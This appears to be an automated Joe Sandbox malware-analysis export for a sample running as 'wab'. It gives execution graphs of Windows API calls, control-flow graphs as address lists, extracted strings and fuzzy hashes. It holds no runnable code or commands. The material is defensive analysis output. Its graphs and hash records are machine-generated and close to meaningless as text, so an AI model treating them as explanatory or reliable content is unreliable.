                                                  execution_graph 32536 5bdb9a8 32537 5bdb9fc 32536->32537 32538 5bdb9d0 32536->32538 32539 5bdb9d9 32538->32539 32541 5bdae04 32538->32541 32542 5bdae0f 32541->32542 32544 5bdbcf3 32542->32544 32545 5bdae20 32542->32545 32544->32537 32546 5bdbd28 OleInitialize 32545->32546 32547 5bdbd8c 32546->32547 32547->32544 32511 288d044 32512 288d05c 32511->32512 32513 288d0b6 32512->32513 32518 5bd7299 32512->32518 32522 5bd4f74 32512->32522 32526 5bd72a8 32512->32526 32530 5bd7ff9 32512->32530 32519 5bd72a8 32518->32519 32520 5bd4f74 CallWindowProcW 32519->32520 32521 5bd72ef 32520->32521 32521->32513 32523 5bd4f7f 32522->32523 32525 5bd8059 32523->32525 32534 5bd509c CallWindowProcW 32523->32534 32527 5bd72ce 32526->32527 32528 5bd4f74 CallWindowProcW 32527->32528 32529 5bd72ef 32528->32529 32529->32513 32532 5bd8035 32530->32532 32533 5bd8059 32532->32533 32535 5bd509c CallWindowProcW 32532->32535 32534->32525 32535->32533 32548 5bd4840 32550 5bd4871 32548->32550 32552 5bd4971 32548->32552 32549 5bd487d 32550->32549 32558 5bd4ab8 32550->32558 32561 5bd4aa8 32550->32561 32551 5bd48bd 32564 5bd61a7 32551->32564 32569 5bd61b8 32551->32569 32574 5bd6171 32551->32574 32580 5bd4af8 32558->32580 32559 5bd4ac2 32559->32551 32562 5bd4ac2 32561->32562 32563 5bd4af8 2 API calls 32561->32563 32562->32551 32563->32562 32565 5bd61e3 32564->32565 32566 5bd6292 32565->32566 32600 5bd7071 32565->32600 32603 5bd70a0 32565->32603 32570 5bd61e3 32569->32570 32571 5bd6292 32570->32571 32572 5bd7071 CreateWindowExW 32570->32572 32573 5bd70a0 CreateWindowExW 32570->32573 32572->32571 32573->32571 32575 5bd617a 32574->32575 32576 5bd61b3 32574->32576 32575->32552 32577 5bd6292 32576->32577 32578 5bd7071 CreateWindowExW 32576->32578 32579 5bd70a0 CreateWindowExW 32576->32579 32578->32577 32579->32577 32581 5bd4b3c 32580->32581 32582 5bd4b19 32580->32582 32581->32559 32582->32581 32588 5bd4d91 32582->32588 32592 5bd4da0 32582->32592 32583 5bd4b34 32583->32581 32584 5bd4d40 GetModuleHandleW 32583->32584 32585 5bd4d6d 32584->32585 32585->32559 32589 5bd4d9d 32588->32589 32591 5bd4dd9 32589->32591 32596 5bd3b18 32589->32596 32591->32583 32593 5bd4db4 32592->32593 32594 5bd3b18 LoadLibraryExW 32593->32594 32595 5bd4dd9 32593->32595 32594->32595 32595->32583 32597 5bd5360 LoadLibraryExW 32596->32597 32599 5bd53d9 32597->32599 32599->32591 32601 5bd70d5 32600->32601 32606 5bd4f4c 32600->32606 32601->32566 32604 5bd4f4c CreateWindowExW 32603->32604 32605 5bd70d5 32604->32605 32605->32566 32607 5bd70f0 CreateWindowExW 32606->32607 32609 5bd7214 32607->32609 32610 5bd9682 32611 5bd96b0 32610->32611 32612 5bd979c 32611->32612 32613 5bd96f2 32611->32613 32614 5bd4f74 CallWindowProcW 32612->32614 32615 5bd974a CallWindowProcW 32613->32615 32616 5bd96f9 32613->32616 32614->32616 32615->32616

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1114 28b6fc8-28b6ffe 1249 28b7000 call 28b6fc8 1114->1249 1250 28b7000 call 28b7118 1114->1250 1115 28b7006-28b700c 1116 28b700e-28b7012 1115->1116 1117 28b705c-28b7060 1115->1117 1120 28b7021-28b7028 1116->1120 1121 28b7014-28b7019 1116->1121 1118 28b7062-28b7071 1117->1118 1119 28b7077-28b708b 1117->1119 1122 28b709d-28b70a7 1118->1122 1123 28b7073-28b7075 1118->1123 1246 28b708d call 28ba088 1119->1246 1247 28b708d call 28ba0e8 1119->1247 1248 28b708d call 28b9e81 1119->1248 1124 28b70fe-28b713b 1120->1124 1125 28b702e-28b7035 1120->1125 1121->1120 1127 28b70a9-28b70af 1122->1127 1128 28b70b1-28b70b5 1122->1128 1126 28b7093-28b709a 1123->1126 1135 28b713d-28b7143 1124->1135 1136 28b7146-28b7166 1124->1136 1125->1117 1129 28b7037-28b703b 1125->1129 1130 28b70bd-28b70f7 1127->1130 1128->1130 1132 28b70b7 1128->1132 1133 28b704a-28b7051 1129->1133 1134 28b703d-28b7042 1129->1134 1130->1124 1132->1130 1133->1124 1137 28b7057-28b705a 1133->1137 1134->1133 1135->1136 1143 28b7168 1136->1143 1144 28b716d-28b7174 1136->1144 1137->1126 1145 28b74fc-28b7505 1143->1145 1146 28b7176-28b7181 1144->1146 1148 28b750d-28b7519 1146->1148 1149 28b7187-28b719a 1146->1149 1155 28b751b-28b7521 1148->1155 1156 28b74a6-28b74ab 1148->1156 1153 28b719c-28b71aa 1149->1153 1154 28b71b0-28b71cb 1149->1154 1153->1154 1168 28b7484-28b748b 1153->1168 1170 28b71ef-28b71f2 1154->1170 1171 28b71cd-28b71d3 1154->1171 1159 28b74ae-28b74b2 1155->1159 1160 28b7523-28b7549 1155->1160 1157 28b74ad 1156->1157 1158 28b74f0-28b74f3 1156->1158 1157->1159 1161 28b7508 1158->1161 1162 28b74f5-28b74fa 1158->1162 1159->1161 1163 28b74b4 1159->1163 1176 28b754b-28b7550 1160->1176 1177 28b7552-28b7556 1160->1177 1161->1148 1162->1145 1166 28b748d-28b748f 1162->1166 1167 28b74bb-28b74c0 1163->1167 1180 28b749e-28b74a4 1166->1180 1181 28b7491-28b7496 1166->1181 1174 28b74e2-28b74e4 1167->1174 1175 28b74c2-28b74c4 1167->1175 1168->1145 1168->1166 1172 28b71f8-28b71fb 1170->1172 1173 28b734c-28b7352 1170->1173 1178 28b71dc-28b71df 1171->1178 1179 28b71d5 1171->1179 1172->1173 1184 28b7201-28b7207 1172->1184 1182 28b7358-28b735d 1173->1182 1183 28b743e-28b7441 1173->1183 1174->1161 1188 28b74e6-28b74e9 1174->1188 1185 28b74d3-28b74d9 1175->1185 1186 28b74c6-28b74cb 1175->1186 1187 28b755c-28b755d 1176->1187 1177->1187 1189 28b7212-28b7218 1178->1189 1190 28b71e1-28b71e4 1178->1190 1179->1173 1179->1178 1179->1183 1179->1189 1180->1148 1180->1156 1181->1180 1182->1183 1183->1161 1192 28b7447-28b744d 1183->1192 1184->1173 1191 28b720d 1184->1191 1185->1148 1195 28b74db-28b74e0 1185->1195 1186->1185 1188->1158 1193 28b721a-28b721c 1189->1193 1194 28b721e-28b7220 1189->1194 1196 28b71ea 1190->1196 1197 28b727e-28b7284 1190->1197 1191->1183 1199 28b744f-28b7457 1192->1199 1200 28b7472-28b7476 1192->1200 1201 28b722a-28b7233 1193->1201 1194->1201 1195->1174 1202 28b74b6-28b74b9 1195->1202 1196->1183 1197->1183 1198 28b728a-28b7290 1197->1198 1203 28b7292-28b7294 1198->1203 1204 28b7296-28b7298 1198->1204 1199->1148 1205 28b745d-28b746c 1199->1205 1200->1168 1208 28b7478-28b747e 1200->1208 1206 28b7246-28b726e 1201->1206 1207 28b7235-28b7240 1201->1207 1202->1161 1202->1167 1209 28b72a2-28b72b9 1203->1209 1204->1209 1205->1154 1205->1200 1220 28b7362-28b7398 1206->1220 1221 28b7274-28b7279 1206->1221 1207->1183 1207->1206 1208->1146 1208->1168 1215 28b72bb-28b72d4 1209->1215 1216 28b72e4-28b730b 1209->1216 1215->1220 1224 28b72da-28b72df 1215->1224 1216->1161 1226 28b7311-28b7314 1216->1226 1227 28b739a-28b739e 1220->1227 1228 28b73a5-28b73ad 1220->1228 1221->1220 1224->1220 1226->1161 1229 28b731a-28b7343 1226->1229 1230 28b73bd-28b73c1 1227->1230 1231 28b73a0-28b73a3 1227->1231 1228->1161 1232 28b73b3-28b73b8 1228->1232 1229->1220 1244 28b7345-28b734a 1229->1244 1233 28b73c3-28b73c9 1230->1233 1234 28b73e0-28b73e4 1230->1234 1231->1228 1231->1230 1232->1183 1233->1234 1236 28b73cb-28b73d3 1233->1236 1237 28b73ee-28b740d call 28b76f1 1234->1237 1238 28b73e6-28b73ec 1234->1238 1236->1161 1239 28b73d9-28b73de 1236->1239 1241 28b7413-28b7417 1237->1241 1238->1237 1238->1241 1239->1183 1241->1183 1242 28b7419-28b7435 1241->1242 1242->1183 1244->1220 1246->1126 1247->1126 1248->1126 1249->1115 1250->1115
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3274109949.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_28b0000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (o]q$(o]q$(o]q$,aq$,aq
                                                  • API String ID: 0-615190528
                                                  • Opcode ID: eb423545c2eb1cf6c265e0dc5efc79e85355831e292a30f4b84926b1e3009872
                                                  • Instruction ID: 349daf819a3ca0056202c1709f7d9f2548c9b3a2eb573d2c812e34c50bc26229
                                                  • Opcode Fuzzy Hash: eb423545c2eb1cf6c265e0dc5efc79e85355831e292a30f4b84926b1e3009872
                                                  • Instruction Fuzzy Hash: D5124C7AA00209DFCB16CF68C984AEDFBB2BF88304F558069E819EB365D734D941CB51

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1362 28bc146-28bc158 1363 28bc15a-28bc172 1362->1363 1364 28bc184 1362->1364 1368 28bc17b-28bc17e 1363->1368 1369 28bc174-28bc179 1363->1369 1365 28bc186-28bc18a 1364->1365 1370 28bc18b-28bc199 1368->1370 1371 28bc180-28bc182 1368->1371 1369->1365 1373 28bc19b-28bc19d 1370->1373 1374 28bc212-28bc214 1370->1374 1371->1363 1371->1364 1375 28bc19f-28bc1a1 1373->1375 1376 28bc216-28bc219 1373->1376 1374->1376 1377 28bc21a-28bc2ac call 28b41a0 call 28b3cc0 1375->1377 1378 28bc1a3-28bc1c8 1375->1378 1376->1377 1390 28bc2ae 1377->1390 1391 28bc2b3-28bc2d4 call 28b5658 1377->1391 1379 28bc1ca 1378->1379 1380 28bc1cf-28bc20a 1378->1380 1379->1380 1380->1374 1390->1391 1393 28bc2d9-28bc2e4 1391->1393 1394 28bc2eb-28bc2ef 1393->1394 1395 28bc2e6 1393->1395 1396 28bc2f1-28bc2f2 1394->1396 1397 28bc2f4-28bc2fb 1394->1397 1395->1394 1398 28bc313-28bc357 1396->1398 1399 28bc2fd 1397->1399 1400 28bc302-28bc310 1397->1400 1404 28bc3bd-28bc3d4 1398->1404 1399->1400 1400->1398 1406 28bc359-28bc36f 1404->1406 1407 28bc3d6-28bc3fb 1404->1407 1411 28bc399 1406->1411 1412 28bc371-28bc37d 1406->1412 1416 28bc3fd-28bc412 1407->1416 1417 28bc413 1407->1417 1415 28bc39f-28bc3bc 1411->1415 1413 28bc37f-28bc385 1412->1413 1414 28bc387-28bc38d 1412->1414 1418 28bc397 1413->1418 1414->1418 1415->1404 1416->1417 1418->1415
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3274109949.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_28b0000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
                                                  • API String ID: 0-1229222154
                                                  • Opcode ID: df3414a8a7c850a6043c7e9d340617ae0982902c72bad38db6178ee22ca73e9b
                                                  • Instruction ID: ed55cf8a44b5c2a9114521dabe9d389fbf6e9028df7508d17162b6d9e18e33bd
                                                  • Opcode Fuzzy Hash: df3414a8a7c850a6043c7e9d340617ae0982902c72bad38db6178ee22ca73e9b
                                                  • Instruction Fuzzy Hash: F4A1F979E00218DFDB15CFAAC884A9DBBF2BF89310F14806AD819EB365DB349841CF51

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1422 28b5362-28b5364 1423 28b5366-28b5376 1422->1423 1424 28b53c4-28b5484 call 28b41a0 call 28b3cc0 1422->1424 1425 28b539b-28b539d 1423->1425 1426 28b5378-28b537a 1423->1426 1441 28b548b-28b54ac call 28b5658 1424->1441 1442 28b5486 1424->1442 1428 28b539f-28b53a0 1425->1428 1426->1428 1429 28b537c-28b5399 1426->1429 1430 28b53a2-28b53a4 1428->1430 1431 28b53a7-28b53c2 1428->1431 1429->1425 1430->1431 1431->1424 1443 28b54b2-28b54bd 1441->1443 1442->1441 1444 28b54bf 1443->1444 1445 28b54c4-28b54c8 1443->1445 1444->1445 1446 28b54ca-28b54cb 1445->1446 1447 28b54cd-28b54d4 1445->1447 1448 28b54ec-28b5530 1446->1448 1449 28b54db-28b54e9 1447->1449 1450 28b54d6 1447->1450 1454 28b5596-28b55ad 1448->1454 1449->1448 1450->1449 1456 28b55af-28b55d4 1454->1456 1457 28b5532-28b5548 1454->1457 1463 28b55ec 1456->1463 1464 28b55d6-28b55eb 1456->1464 1461 28b554a-28b5556 1457->1461 1462 28b5572 1457->1462 1465 28b5558-28b555e 1461->1465 1466 28b5560-28b5566 1461->1466 1467 28b5578-28b5595 1462->1467 1464->1463 1468 28b5570 1465->1468 1466->1468 1467->1454 1468->1467
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3274109949.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_28b0000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
                                                  • API String ID: 0-1229222154
                                                  • Opcode ID: 4bb03d97c3ed97b7d7f67f13d9c698544ff7f3958a2d591a8c5c33bbe072b4cc
                                                  • Instruction ID: 5aff715805ea83ac3bafa8350ed3e00961491aec8f2f9f7928d1e72af91eb472
                                                  • Opcode Fuzzy Hash: 4bb03d97c3ed97b7d7f67f13d9c698544ff7f3958a2d591a8c5c33bbe072b4cc
                                                  • Instruction Fuzzy Hash: 5C91E278E00248CFDB15CFA9C894A9DBBF2BF89301F5480A9D809EB365DB349985CF51

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1473 28bc468-28bc46d 1474 28bc46f-28bc472 1473->1474 1475 28bc4e6-28bc57c call 28b41a0 call 28b3cc0 1473->1475 1476 28bc497-28bc498 1474->1476 1477 28bc474-28bc491 1474->1477 1491 28bc57e 1475->1491 1492 28bc583-28bc5a4 call 28b5658 1475->1492 1479 28bc49a-28bc49e 1476->1479 1480 28bc49f-28bc4cc 1476->1480 1477->1476 1479->1480 1481 28bc4d3-28bc4e4 1479->1481 1480->1481 1481->1475 1491->1492 1494 28bc5a9-28bc5b4 1492->1494 1495 28bc5bb-28bc5bf 1494->1495 1496 28bc5b6 1494->1496 1497 28bc5c1-28bc5c2 1495->1497 1498 28bc5c4-28bc5cb 1495->1498 1496->1495 1499 28bc5e3-28bc627 1497->1499 1500 28bc5cd 1498->1500 1501 28bc5d2-28bc5e0 1498->1501 1505 28bc68d-28bc6a4 1499->1505 1500->1501 1501->1499 1507 28bc629-28bc63f 1505->1507 1508 28bc6a6-28bc6cb 1505->1508 1512 28bc669 1507->1512 1513 28bc641-28bc64d 1507->1513 1514 28bc6cd-28bc6e2 1508->1514 1515 28bc6e3 1508->1515 1518 28bc66f-28bc68c 1512->1518 1516 28bc64f-28bc655 1513->1516 1517 28bc657-28bc65d 1513->1517 1514->1515 1519 28bc667 1516->1519 1517->1519 1518->1505 1519->1518
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3274109949.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_28b0000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
                                                  • API String ID: 0-1229222154
                                                  • Opcode ID: 786fa5444426f46584209eab21617fc1d24c083caf799f2efdf0ca61544cfffa
                                                  • Instruction ID: df84d4187902a384f5c058a67f14d1716b03a76fc338c302c0c15af352d3a8d5
                                                  • Opcode Fuzzy Hash: 786fa5444426f46584209eab21617fc1d24c083caf799f2efdf0ca61544cfffa
                                                  • Instruction Fuzzy Hash: 3991D378E002588FDB15DFAAC884ADDBBF2BF88300F14806AD819EB365DB349945CF51

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1523 28bca08-28bca0a 1524 28bca2f-28bca31 1523->1524 1525 28bca0c-28bca0e 1523->1525 1526 28bca33-28bca38 1524->1526 1525->1526 1527 28bca10-28bca2d 1525->1527 1528 28bca3a-28bca3e 1526->1528 1529 28bca3f-28bca6c 1526->1529 1527->1524 1528->1529 1531 28bca73-28bcb1c call 28b41a0 call 28b3cc0 1528->1531 1529->1531 1542 28bcb1e 1531->1542 1543 28bcb23-28bcb44 call 28b5658 1531->1543 1542->1543 1545 28bcb49-28bcb54 1543->1545 1546 28bcb5b-28bcb5f 1545->1546 1547 28bcb56 1545->1547 1548 28bcb61-28bcb62 1546->1548 1549 28bcb64-28bcb6b 1546->1549 1547->1546 1550 28bcb83-28bcbc7 1548->1550 1551 28bcb6d 1549->1551 1552 28bcb72-28bcb80 1549->1552 1556 28bcc2d-28bcc44 1550->1556 1551->1552 1552->1550 1558 28bcbc9-28bcbdf 1556->1558 1559 28bcc46-28bcc6b 1556->1559 1563 28bcc09 1558->1563 1564 28bcbe1-28bcbed 1558->1564 1565 28bcc6d-28bcc82 1559->1565 1566 28bcc83 1559->1566 1569 28bcc0f-28bcc2c 1563->1569 1567 28bcbef-28bcbf5 1564->1567 1568 28bcbf7-28bcbfd 1564->1568 1565->1566 1570 28bcc07 1567->1570 1568->1570 1569->1556 1570->1569
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3274109949.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_28b0000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
                                                  • API String ID: 0-1229222154
                                                  • Opcode ID: ee2b00dc1f74cb683c65734ce11e37a46950b5ea8a824a135455be46d00d940a
                                                  • Instruction ID: fbd508d2568a4e3916aaf7453cd8ca644154ae9dbb0882188e1c6029647989e3
                                                  • Opcode Fuzzy Hash: ee2b00dc1f74cb683c65734ce11e37a46950b5ea8a824a135455be46d00d940a
                                                  • Instruction Fuzzy Hash: 3D91E478E00248CFDB15DFAAD854A9DBBF2BF89300F14806AD819EB365DB349885CF51

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1574 28bccd8-28bccda 1575 28bccff-28bcd01 1574->1575 1576 28bccdc-28bccde 1574->1576 1577 28bcd03-28bcd08 1575->1577 1576->1577 1578 28bcce0-28bccfd 1576->1578 1579 28bcd0a-28bcd0c 1577->1579 1580 28bcd0f-28bcdec call 28b41a0 call 28b3cc0 1577->1580 1578->1575 1579->1580 1591 28bcdee 1580->1591 1592 28bcdf3-28bce14 call 28b5658 1580->1592 1591->1592 1594 28bce19-28bce24 1592->1594 1595 28bce2b-28bce2f 1594->1595 1596 28bce26 1594->1596 1597 28bce31-28bce32 1595->1597 1598 28bce34-28bce3b 1595->1598 1596->1595 1599 28bce53-28bce97 1597->1599 1600 28bce3d 1598->1600 1601 28bce42-28bce50 1598->1601 1605 28bcefd-28bcf14 1599->1605 1600->1601 1601->1599 1607 28bce99-28bceaf 1605->1607 1608 28bcf16-28bcf3b 1605->1608 1612 28bced9 1607->1612 1613 28bceb1-28bcebd 1607->1613 1614 28bcf3d-28bcf52 1608->1614 1615 28bcf53 1608->1615 1618 28bcedf-28bcefc 1612->1618 1616 28bcebf-28bcec5 1613->1616 1617 28bcec7-28bcecd 1613->1617 1614->1615 1619 28bced7 1616->1619 1617->1619 1618->1605 1619->1618
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3274109949.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_28b0000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
                                                  • API String ID: 0-1229222154
                                                  • Opcode ID: a6edf754f72cc860ae79beb9144ddcfaa5b25c1899c143250322d83f51710ea3
                                                  • Instruction ID: daae8b3e350019805a8ff1f2579c2f20b9bbc950cf9d15cd11587def7831b2ce
                                                  • Opcode Fuzzy Hash: a6edf754f72cc860ae79beb9144ddcfaa5b25c1899c143250322d83f51710ea3
                                                  • Instruction Fuzzy Hash: 3791B478E00248DFDB15CFA9D844A9DBBF2BF89300F14806AD819EB365DB349985CF51

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1623 28bc738-28bc768 1624 28bc76a 1623->1624 1625 28bc76f-28bc84c call 28b41a0 call 28b3cc0 1623->1625 1624->1625 1635 28bc84e 1625->1635 1636 28bc853-28bc874 call 28b5658 1625->1636 1635->1636 1638 28bc879-28bc884 1636->1638 1639 28bc88b-28bc88f 1638->1639 1640 28bc886 1638->1640 1641 28bc891-28bc892 1639->1641 1642 28bc894-28bc89b 1639->1642 1640->1639 1643 28bc8b3-28bc8f7 1641->1643 1644 28bc89d 1642->1644 1645 28bc8a2-28bc8b0 1642->1645 1649 28bc95d-28bc974 1643->1649 1644->1645 1645->1643 1651 28bc8f9-28bc90f 1649->1651 1652 28bc976-28bc99b 1649->1652 1656 28bc939 1651->1656 1657 28bc911-28bc91d 1651->1657 1659 28bc99d-28bc9b2 1652->1659 1660 28bc9b3 1652->1660 1658 28bc93f-28bc95c 1656->1658 1661 28bc91f-28bc925 1657->1661 1662 28bc927-28bc92d 1657->1662 1658->1649 1659->1660 1663 28bc937 1661->1663 1662->1663 1663->1658
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3274109949.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_28b0000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
                                                  • API String ID: 0-1229222154
                                                  • Opcode ID: cb001ce32e22ace2c38efed4d71d430904a61a1762225e8d0ccca7aa445915ed
                                                  • Instruction ID: 7cfb48c86b82ca4a6608308f38546f69492db407f4be242bbe9c9c7b2832dc33
                                                  • Opcode Fuzzy Hash: cb001ce32e22ace2c38efed4d71d430904a61a1762225e8d0ccca7aa445915ed
                                                  • Instruction Fuzzy Hash: 3A81A378E002189FDB15DFAAD984A9DBBF2BF88300F14C06AD819EB365DB349945CF51

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1667 28bd599-28bd5c8 1668 28bd5ca 1667->1668 1669 28bd5cf-28bd6ac call 28b41a0 call 28b3cc0 1667->1669 1668->1669 1679 28bd6ae 1669->1679 1680 28bd6b3-28bd6d4 call 28b5658 1669->1680 1679->1680 1682 28bd6d9-28bd6e4 1680->1682 1683 28bd6eb-28bd6ef 1682->1683 1684 28bd6e6 1682->1684 1685 28bd6f1-28bd6f2 1683->1685 1686 28bd6f4-28bd6fb 1683->1686 1684->1683 1687 28bd713-28bd757 1685->1687 1688 28bd6fd 1686->1688 1689 28bd702-28bd710 1686->1689 1693 28bd7bd-28bd7d4 1687->1693 1688->1689 1689->1687 1695 28bd759-28bd76f 1693->1695 1696 28bd7d6-28bd7fb 1693->1696 1700 28bd799 1695->1700 1701 28bd771-28bd77d 1695->1701 1702 28bd7fd-28bd812 1696->1702 1703 28bd813 1696->1703 1706 28bd79f-28bd7bc 1700->1706 1704 28bd77f-28bd785 1701->1704 1705 28bd787-28bd78d 1701->1705 1702->1703 1707 28bd797 1704->1707 1705->1707 1706->1693 1707->1706
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3274109949.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_28b0000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
                                                  • API String ID: 0-1229222154
                                                  • Opcode ID: d460d3e344bb30502e82e1576c88ea6626489687aa8f50b0b7e5a8430b23838d
                                                  • Instruction ID: 7f4620c1d6781175a375476bf9cb1f436e6a45d6c90e5cf8b1de2e3653fae0ec
                                                  • Opcode Fuzzy Hash: d460d3e344bb30502e82e1576c88ea6626489687aa8f50b0b7e5a8430b23838d
                                                  • Instruction Fuzzy Hash: 2581C178E00218DFDB15DFAAD984A9DBBF2BF88300F148069D819EB365DB34A945CF51

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1711 28bcfab-28bcfd8 1712 28bcfda 1711->1712 1713 28bcfdf-28bd03e call 28b41a0 1711->1713 1712->1713 1717 28bd043-28bd0bc call 28b3cc0 1713->1717 1723 28bd0be 1717->1723 1724 28bd0c3-28bd0f4 call 28b5658 1717->1724 1723->1724 1727 28bd0fb-28bd0ff 1724->1727 1728 28bd0f6 1724->1728 1729 28bd101-28bd102 1727->1729 1730 28bd104-28bd10b 1727->1730 1728->1727 1731 28bd123-28bd167 1729->1731 1732 28bd10d 1730->1732 1733 28bd112-28bd120 1730->1733 1737 28bd1cd-28bd1e4 1731->1737 1732->1733 1733->1731 1739 28bd169-28bd17f 1737->1739 1740 28bd1e6-28bd20b 1737->1740 1744 28bd1a9 1739->1744 1745 28bd181-28bd18d 1739->1745 1746 28bd20d-28bd222 1740->1746 1747 28bd223 1740->1747 1750 28bd1af-28bd1cc 1744->1750 1748 28bd18f-28bd195 1745->1748 1749 28bd197-28bd19d 1745->1749 1746->1747 1751 28bd1a7 1748->1751 1749->1751 1750->1737 1751->1750
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3274109949.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_28b0000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
                                                  • API String ID: 0-1229222154
                                                  • Opcode ID: d8ac58f17e10f2517f7f46b73e613a31ec44a77754e00dc53d89b899e7b23efd
                                                  • Instruction ID: f03ddac6b02d7aa50681ef6a91a666eadc64c282e7012426a311d03c11fc6fd5
                                                  • Opcode Fuzzy Hash: d8ac58f17e10f2517f7f46b73e613a31ec44a77754e00dc53d89b899e7b23efd
                                                  • Instruction Fuzzy Hash: C281A478E00218DFDB15DFAAD984A9DFBF2BF88300F148069D819AB365DB349945CF51
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3274109949.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_28b0000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Xaq$Xaq$Xaq$Xaq
                                                  • API String ID: 0-4015495023
                                                  • Opcode ID: 719cb2555b7c669d8cd33ac3567a7e79e9ba677bd4c208ac25b873bd979ca952
                                                  • Instruction ID: 0c8df83749d06f5ad84a05b8e4c685ce09c813564085fc34bca8431c048b2478
                                                  • Opcode Fuzzy Hash: 719cb2555b7c669d8cd33ac3567a7e79e9ba677bd4c208ac25b873bd979ca952
                                                  • Instruction Fuzzy Hash: 0AF1B239A096969FCB12DF7CC4A0A9ABFF1FF4B200B0405EDD9959B31AC734A955CB01
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3307348599.0000000024490000.00000040.00000800.00020000.00000000.sdmp, Offset: 24490000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_24490000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: N
                                                  • API String ID: 0-1130791706
                                                  • Opcode ID: 95193c51b7e57b21254ecd8dfe4ed278549aabb36603923c24ab180e70d0d919
                                                  • Instruction ID: 0101e659cb27b5f507715de8dce6a424667fb0b9dbad97b20128b6f386354fda
                                                  • Opcode Fuzzy Hash: 95193c51b7e57b21254ecd8dfe4ed278549aabb36603923c24ab180e70d0d919
                                                  • Instruction Fuzzy Hash: DE73F731D1075A8ECB11EF68C854AADFBB1FF99300F51D69AE44867221EB70AAD4CF41
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3274109949.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_28b0000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (o]q$4']q
                                                  • API String ID: 0-176817397
                                                  • Opcode ID: 118a96c557b8932db2129934f807c7b6ffa32f6081c30f3c8ec3b83fd233ce69
                                                  • Instruction ID: 2e86cdec22da3a351f837119798e8ad01c7df2d5651fe7d6720fd6871e95826f
                                                  • Opcode Fuzzy Hash: 118a96c557b8932db2129934f807c7b6ffa32f6081c30f3c8ec3b83fd233ce69
